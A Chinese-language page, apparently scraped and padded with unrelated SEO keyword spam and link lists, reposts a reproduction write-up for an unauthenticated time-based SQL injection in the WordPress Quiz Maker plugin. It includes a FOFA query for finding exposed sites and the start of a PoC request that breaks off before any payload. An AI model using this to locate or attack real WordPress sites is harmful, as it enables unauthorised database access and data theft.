当前位置: 首页 > news >正文

聊天室网站开发百度推广方式

聊天室网站开发,百度推广方式,手机版网站,wordpress恢复默认设置0x01 产品简介 WordPress Quiz Maker插件是一款功能强大的测验生成工具,旨在帮助用户轻松、快速地构建复杂的测验和考试。插件支持多种问题类型,包括单选框(MCQ)、复选框(MCQ)、下拉列表(MCQ)、文本、短文本、数字、日期等。还支持横幅(HTML)显示信息性消息、填空题…

0x01 产品简介

WordPress Quiz Maker插件是一款功能强大的测验生成工具,旨在帮助用户轻松、快速地构建复杂的测验和考试。插件支持多种问题类型,包括单选框(MCQ)、复选框(MCQ)、下拉列表(MCQ)、文本、短文本、数字、日期等。还支持横幅(HTML)显示信息性消息、填空题以及匹配题,让测验更加多样化和全面,适合各种规模和需求的网站使用。

0x02 漏洞概述

WordPress的Quiz Maker插件在6.5.8.3版本及以下存在基于时间的SQL注入漏洞,漏洞位于“ays_questions”参数上。由于对用户提供的参数缺乏足够的转义处理和对现有SQL查询的充分准备不足,使得未经验证的攻击者能够在已有的查询中附加额外的SQL查询,从而可能从数据库中提取敏感信息。

0x03 影响范围

Quiz Maker <= 6.5.8.3

0x04 复现环境

FOFA:"/wp-content/plugins/quiz-maker/"

0x05 漏洞复现

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe
http://www.yayakq.cn/news/438015/

相关文章:

  • 佛山网站优化什么价格google网站打不开了
  • 物流网站如何设计网站建设开发ppt模板
  • 葫芦岛网站网站建设中电建铁路建设公司网站
  • 住房和城市建设厅网站网站建设报告书总结
  • 四川省铁路建设有限公司网站公司部门聚餐计入什么科目
  • 无极商城网站建设wordpress 更换空间
  • 企业网站可信度建设陕西网站建设优化建站
  • 创建学校网站学产品设计好找工作吗
  • 养老院微网站建设方案乐搜做网站
  • 刷死粉网站推广深圳大型网站建设服务
  • 网站建设如何投放广告百度广告开户流程
  • 网站空间不够用怎么办价格低的手机
  • 网站建设结论与改进免费的精准引流软件
  • 中国建设信用卡积分兑换网站校园活动策划案的范文
  • iis做的网站手机怎么访问通过骗子网站能找到其服务器吗
  • 北京公司网站制作费用广点通投放平台登录
  • 班组建设管理网站寻找聊城做网站的公司
  • 网站特效怎么做的wordpress 提速插件
  • 网站推广渠道有哪些北京专业建设网站公司
  • 网站建设项目验收方案西城专业网站建设公司哪家好
  • 做服务的网站起名广州番禺景点
  • 宁波拾谷网站建设可以做淘宝客的网站有哪些
  • 个人网站备案信息邯郸网站设计怎么注册
  • 深圳网站建设制作视频软件wordpress多说插件
  • 汽车网站建设需要多少钱北京网页设计公司哪儿济南兴田德润简介
  • 卖文具的网站建设gzip wordpress
  • 淘宝网站建设那么便宜大连网站设计
  • 昆明网站设计网站变量
  • 那些小网站是哪里人做的印刷下单网站开发
  • 企业网站建设中的常见问题专做视频和ppt的网站